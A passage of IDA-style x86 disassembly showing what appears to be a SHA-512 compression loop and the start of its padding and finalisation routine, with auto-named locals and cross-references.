		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_AC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_F0]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_EC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_F0]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_EC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_A8]
		adc	edx, [esp+170h+var_A4]
		add	ecx, [esp+170h+var_F8]
		adc	edx, [esp+170h+var_F4]
		mov	[eax+0A8h], ecx
		mov	[eax+0ACh], edx
		mov	eax, edx
		mov	[esp+170h+var_F8], ecx
		mov	[esp+170h+var_F4], eax
		mov	[esp+170h+var_50], ecx
		jmp	short loc_416C00
; ---------------------------------------------------------------------------

loc_416BF1:				; CODE XREF: sub_415050+1AB0j
		mov	edx, [esp+170h+var_F8]
		mov	eax, [esp+170h+var_F4]
		mov	[esp+170h+var_50], edx

loc_416C00:				; CODE XREF: sub_415050+1B9Fj
		mov	ecx, [esp+170h+var_14C]
		mov	ebx, ecx
		mov	[esp+170h+var_4C], eax
		mov	eax, [esp+170h+var_150]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_148]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_14C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_144]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_134]
		not	ebx
		and	ebx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_140]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B50[eax*8]
		adc	esi, ds:dword_420B54[eax*8]
		add	edx, [esp+170h+var_50]
		mov	eax, [esp+170h+var_138]
		adc	esi, [esp+170h+var_4C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_158], eax
		mov	[esp+170h+var_134], ecx
		mov	[esp+170h+var_138], eax
		adc	[esp+170h+var_154], ecx
		mov	ecx, [esp+170h+var_130]
		mov	eax, [esp+170h+var_12C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_130]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_124]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_128]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_130]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_120]
		and	edx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	ebp, eax
		and	ebp, [esp+170h+var_11C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_138], edi
		adc	[esp+170h+var_134], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416E43
		mov	eax, [esp+170h+var_C0]
		mov	ecx, [esp+170h+var_BC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_BC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_E8]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_E4]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_E8]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_E4]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D0]
		adc	edx, [esp+170h+var_CC]
		add	ecx, [esp+170h+var_B0]
		adc	edx, [esp+170h+var_AC]
		mov	[eax+0B0h], ecx
		mov	[eax+0B4h], edx
		mov	eax, edx
		mov	[esp+170h+var_B0], ecx
		mov	[esp+170h+var_AC], eax
		mov	[esp+170h+var_40], ecx
		jmp	short loc_416E58
; ---------------------------------------------------------------------------

loc_416E43:				; CODE XREF: sub_415050+1CF6j
		mov	edx, [esp+170h+var_B0]
		mov	eax, [esp+170h+var_AC]
		mov	[esp+170h+var_40], edx

loc_416E58:				; CODE XREF: sub_415050+1DF1j
		mov	ecx, [esp+170h+var_154]
		mov	[esp+170h+var_3C], eax
		mov	eax, [esp+170h+var_158]
		mov	ebx, ecx
		xor	esi, esi
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		mov	edx, ecx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		xor	ebx, ebx
		or	ebx, ebp
		mov	ebp, [esp+170h+var_154]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		shr	ebp, 0Eh
		or	ecx, ebp
		mov	ebp, [esp+170h+var_150]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_154]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_14C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_144]
		xor	edi, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B58[eax*8]
		mov	edi, [esp+170h+var_12C]
		adc	esi, ds:dword_420B5C[eax*8]
		add	edx, [esp+170h+var_40]
		mov	eax, [esp+170h+var_140]
		adc	esi, [esp+170h+var_3C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_120], eax
		mov	esi, [esp+170h+var_130]
		mov	[esp+170h+var_140], eax
		adc	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_138]
		mov	eax, esi
		xor	eax, ecx
		mov	[esp+170h+var_98], eax
		mov	eax, [esp+170h+var_134]
		mov	edx, edi
		xor	edx, eax
		mov	[esp+170h+var_94], edx
		mov	edx, esi
		and	edx, ecx
		mov	[esp+170h+var_90], edx
		mov	edx, edi
		and	edx, eax
		mov	[esp+170h+var_8C], edx
		mov	edx, ecx
		xor	esi, esi
		shl	edx, 4
		mov	edi, ecx
		mov	ebx, eax
		shrd	edi, ebx, 1Ch
		shr	ebx, 1Ch
		or	edx, ebx
		or	esi, edi
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	ebx, ebx
		shl	ecx, 1Eh
		or	ebx, ebp
		mov	edi, eax
		xor	edx, ebx
		mov	ebx, [esp+170h+var_138]
		shr	edi, 2
		or	edi, ecx
		mov	ecx, eax
		shld	eax, ebx, 19h
		xor	esi, edi
		shr	ecx, 7
		xor	edi, edi
		or	edi, eax
		mov	eax, [esp+170h+var_98]
		and	eax, [esp+170h+var_128]
		shl	ebx, 19h
		xor	eax, [esp+170h+var_90]
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_94]
		and	ecx, [esp+170h+var_124]
		xor	edx, edi
		xor	ecx, [esp+170h+var_8C]
		add	esi, eax
		adc	edx, ecx
		add	[esp+170h+var_140], esi
		adc	[esp+170h+var_13C], edx
		cmp	[esp+170h+var_15C], 0
		jz	loc_4170BF
		mov	eax, [esp+170h+var_A0]
		mov	ecx, [esp+170h+var_9C]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_9C]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_F8]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_F4]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_F8]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_F4]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D8]
		adc	edx, [esp+170h+var_D4]
		add	ecx, [esp+170h+var_C0]
		adc	edx, [esp+170h+var_BC]
		mov	[eax+0B8h], ecx
		mov	[eax+0BCh], edx
		mov	eax, edx
		mov	[esp+170h+var_C0], ecx
		mov	[esp+170h+var_BC], eax
		mov	[esp+170h+var_30], ecx
		jmp	short loc_4170D4
; ---------------------------------------------------------------------------

loc_4170BF:				; CODE XREF: sub_415050+1F7Ej
		mov	edx, [esp+170h+var_C0]
		mov	eax, [esp+170h+var_BC]
		mov	[esp+170h+var_30], edx

loc_4170D4:				; CODE XREF: sub_415050+206Dj
		mov	ecx, [esp+170h+var_11C]
		mov	ebx, ecx
		mov	[esp+170h+var_2C], eax
		mov	eax, [esp+170h+var_120]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_11C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		shr	ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_158]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_11C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_154]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_14C]
		not	edi
		and	edi, [esp+170h+var_150]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B60[eax*8]
		adc	esi, ds:dword_420B64[eax*8]
		add	edx, [esp+170h+var_30]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_2C]
		add	ecx, edx
		mov	edx, [esp+170h+var_144]
		adc	edx, esi
		add	eax, ecx
		adc	[esp+170h+var_124], edx
		mov	[esp+170h+var_148], ecx
		mov	ecx, [esp+170h+var_140]
		mov	[esp+170h+var_144], edx
		mov	edx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	ebp, edx
		shrd	ebx, ebp, 1Ch
		xor	edi, edi
		or	edi, ebx
		mov	esi, ecx
		mov	ebx, edx
		shld	edx, ecx, 1Eh
		shr	ebp, 1Ch
		shl	esi, 4
		or	esi, ebp
		shr	ebx, 2
		shl	ecx, 1Eh
		xor	ebp, ebp
		or	ebx, ecx
		mov	[esp+170h+var_128], eax
		or	ebp, edx
		mov	ecx, [esp+170h+var_13C]
		xor	esi, ebp
		mov	ebp, [esp+170h+var_140]
		mov	edx, ecx
		shld	ecx, ebp, 19h
		xor	edi, ebx
		shr	edx, 7
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_98]
		and	ecx, [esp+170h+var_140]
		shl	ebp, 19h
		xor	ecx, [esp+170h+var_90]
		or	edx, ebp
		xor	edi, edx
		mov	edx, [esp+170h+var_94]
		and	edx, [esp+170h+var_13C]
		xor	esi, ebx
		xor	edx, [esp+170h+var_8C]
		add	edi, ecx
		adc	esi, edx
		add	[esp+170h+var_148], edi
		adc	[esp+170h+var_144], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_417320
		mov	eax, [esp+170h+var_B0]
		mov	ecx, [esp+170h+var_AC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_AC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_E0]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_DC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_E0]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_DC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_118]
		adc	edx, [esp+170h+var_114]
		add	ecx, [esp+170h+var_A0]
		adc	edx, [esp+170h+var_9C]
		mov	[eax+0C0h], ecx
		mov	[eax+0C4h], edx
		mov	eax, edx
		mov	[esp+170h+var_9C], eax
		mov	[esp+170h+var_1C], eax
		mov	eax, [esp+170h+var_128]
		mov	[esp+170h+var_A0], ecx
		mov	[esp+170h+var_20], ecx
		jmp	short loc_41733C
; ---------------------------------------------------------------------------

loc_417320:				; CODE XREF: sub_415050+21CEj
		mov	edx, [esp+170h+var_A0]
		mov	ecx, [esp+170h+var_9C]
		mov	[esp+170h+var_20], edx
		mov	[esp+170h+var_1C], ecx

loc_41733C:				; CODE XREF: sub_415050+22CEj
		mov	ecx, [esp+170h+var_124]
		mov	ebx, ecx
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_124]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_120]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_124]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_11C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_14C]
		not	ebx
		and	ebx, [esp+170h+var_154]
		not	edi
		and	edi, [esp+170h+var_158]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B68[eax*8]
		adc	esi, ds:dword_420B6C[eax*8]
		add	edx, [esp+170h+var_20]
		mov	eax, [esp+170h+var_150]
		adc	esi, [esp+170h+var_1C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_130], eax
		mov	[esp+170h+var_14C], ecx
		mov	[esp+170h+var_150], eax
		adc	[esp+170h+var_12C], ecx
		mov	eax, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_148]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_148]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	ebp, [esp+170h+var_134]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_138]
		and	ebp, eax
		mov	eax, [esp+170h+var_13C]
		and	eax, [esp+170h+var_134]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_150], edi
		adc	[esp+170h+var_14C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41756A
		mov	eax, [esp+170h+var_C0]
		mov	ecx, [esp+170h+var_BC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_BC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_100]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_FC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_100]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_FC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C8]
		adc	edx, [esp+170h+var_C4]
		add	ecx, [esp+170h+var_E0]
		adc	edx, [esp+170h+var_DC]
		mov	[eax+0C8h], ecx
		mov	[eax+0CCh], edx
		mov	eax, edx
		mov	[esp+170h+var_E0], ecx
		mov	[esp+170h+var_DC], eax
		mov	[esp+170h+var_10], ecx
		jmp	short loc_41757F
; ---------------------------------------------------------------------------

loc_41756A:				; CODE XREF: sub_415050+2429j
		mov	edx, [esp+170h+var_E0]
		mov	eax, [esp+170h+var_DC]
		mov	[esp+170h+var_10], edx

loc_41757F:				; CODE XREF: sub_415050+2518j
		mov	ecx, [esp+170h+var_12C]
		mov	ebx, ecx
		mov	[esp+170h+var_C], eax
		mov	eax, [esp+170h+var_130]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_12C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_128]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_12C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_124]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_154]
		not	ebx
		and	ebx, [esp+170h+var_11C]
		not	edi
		and	edi, [esp+170h+var_120]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B70[eax*8]
		adc	esi, ds:dword_420B74[eax*8]
		add	edx, [esp+170h+var_10]
		mov	eax, [esp+170h+var_158]
		adc	esi, [esp+170h+var_C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_138], eax
		mov	[esp+170h+var_154], ecx
		mov	[esp+170h+var_158], eax
		adc	[esp+170h+var_134], ecx
		mov	ecx, [esp+170h+var_150]
		mov	eax, [esp+170h+var_14C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_150]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		mov	ebx, ecx
		and	ecx, edx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		mov	ebp, eax
		xor	ebp, [esp+170h+var_13C]
		mov	edx, ecx
		and	ebp, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_13C]
		and	eax, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_158], edi
		mov	edi, [esp+170h+var_15C]
		adc	[esp+170h+var_154], esi
		add	edi, 10h
		cmp	edi, 50h
		mov	[esp+170h+var_15C], edi
		jb	loc_4151E0
		mov	eax, [esp+170h+var_4]
		mov	edx, [esp+170h+var_158]
		add	[eax], edx
		mov	edx, [esp+170h+var_154]
		pop	edi
		adc	[eax+4], edx
		mov	eax, [esp+16Ch+arg_0]
		mov	edx, [esp+16Ch+var_150]
		add	[eax+18h], edx
		mov	edx, [esp+16Ch+var_14C]
		pop	esi
		adc	[eax+1Ch], edx
		mov	edx, [esp+168h+var_148]
		add	[eax+20h], edx
		mov	edx, [esp+168h+var_144]
		pop	ebp
		adc	[eax+24h], edx
		mov	edx, [esp+164h+var_140]
		add	[eax+28h], edx
		mov	edx, [esp+164h+var_134]
		pop	ebx
		adc	[eax+2Ch], ecx
		mov	ecx, [esp+160h+var_138]
		add	[eax+30h], ecx
		mov	ecx, [esp+160h+var_130]
		adc	[eax+34h], edx
		add	[eax+38h], ecx
		mov	edx, [esp+160h+var_12C]
		mov	ecx, [esp+160h+var_128]
		adc	[eax+3Ch], edx
		add	[eax+40h], ecx
		mov	edx, [esp+160h+var_124]
		mov	ecx, [esp+160h+var_120]
		adc	[eax+44h], edx
		add	[eax+48h], ecx
		mov	edx, [esp+160h+var_11C]
		adc	[eax+4Ch], edx
		add	esp, 160h
		retn
sub_415050	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_417760	proc near		; CODE XREF: .text:004179E2p
					; sub_41C1B3+CAp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		push	ecx
		mov	ecx, [ebx]
		push	ebp
		and	ecx, 7Fh
		push	esi
		lea	esi, [ecx+7]
		shr	esi, 3
		push	edi
		mov	[esp+10h+var_4], ecx
		jz	short loc_4177C5
		lea	edx, [ebx+esi*8+50h]

loc_417779:				; CODE XREF: sub_417760+5Fj
		mov	eax, [edx-8]
		mov	ecx, [edx-4]
		sub	edx, 8
		mov	edi, eax
		sub	esi, 1
		ror	edi, 8
		and	edi, 0FF00FF00h
		rol	eax, 8
		and	eax, 0FF00FFh
		or	edi, eax
		mov	ebp, ecx
		xor	eax, eax
		ror	ebp, 8
		and	ebp, 0FF00FF00h
		rol	ecx, 8
		and	ecx, 0FF00FFh
		or	ebp, ecx
		xor	ecx, ecx
		or	eax, ebp
		or	edi, ecx
		test	esi, esi
		mov	[edx], eax
		mov	[edx+4], edi
		jnz	short loc_417779
		mov	ecx, [esp+10h+var_4]

loc_4177C5:				; CODE XREF: sub_417760+13j
		mov	eax, ecx
		and	eax, 7
		add	eax, eax
		add	eax, eax
		mov	esi, dword_426BA8[eax+eax]
		mov	edi, dword_426BAC[eax+eax]
		add	eax, eax
		mov	edx, ecx
		shr	edx, 3
		and	esi, [ebx+edx*8+50h]
		and	edi, [ebx+edx*8+54h]
		or	esi, dword_426BE8[eax]
		or	edi, dword_426BEC[eax]
		cmp	ecx, 6Fh
		mov	[ebx+edx*8+50h], esi
		mov	[ebx+edx*8+54h], edi
		jbe	short loc_41782A
		cmp	ecx, 78h
		jnb	short loc_41781D
		mov	dword ptr [ebx+0C8h], 0
		mov	dword ptr [ebx+0CCh], 0

loc_41781D:				; CODE XREF: sub_417760+A7j
		push	ebx
		call	sub_415050
		add	esp, 4
		xor	edx, edx
		jmp	short loc_417832
; ---------------------------------------------------------------------------

loc_41782A:				; CODE XREF: sub_417760+A2j
		add	edx, 1
		cmp	edx, 0Eh
		jnb	short loc_417858

loc_417832:				; CODE XREF: sub_417760+C8j
		mov	ecx, 0Dh
		sub	ecx, edx
		add	ecx, ecx
		add	ecx, ecx
		lea	esi, [ebx+edx*8+50h]
		add	ecx, ecx
		shr	ecx, 2
		lea	edi, [esi+8]
		mov	dword ptr [esi], 0
		mov	dword ptr [esi+4], 0
		rep movsd

loc_417858:				; CODE XREF: sub_417760+D0j
		mov	edx, [ebx+8]
		mov	esi, [ebx+0Ch]
		mov	ecx, [ebx+4]
		mov	eax, [ebx]
		shld	esi, edx, 3
		add	edx, edx
		mov	edi, ecx
		shld	ecx, eax, 3
		add	edx, edx
		add	eax, eax
		add	edx, edx
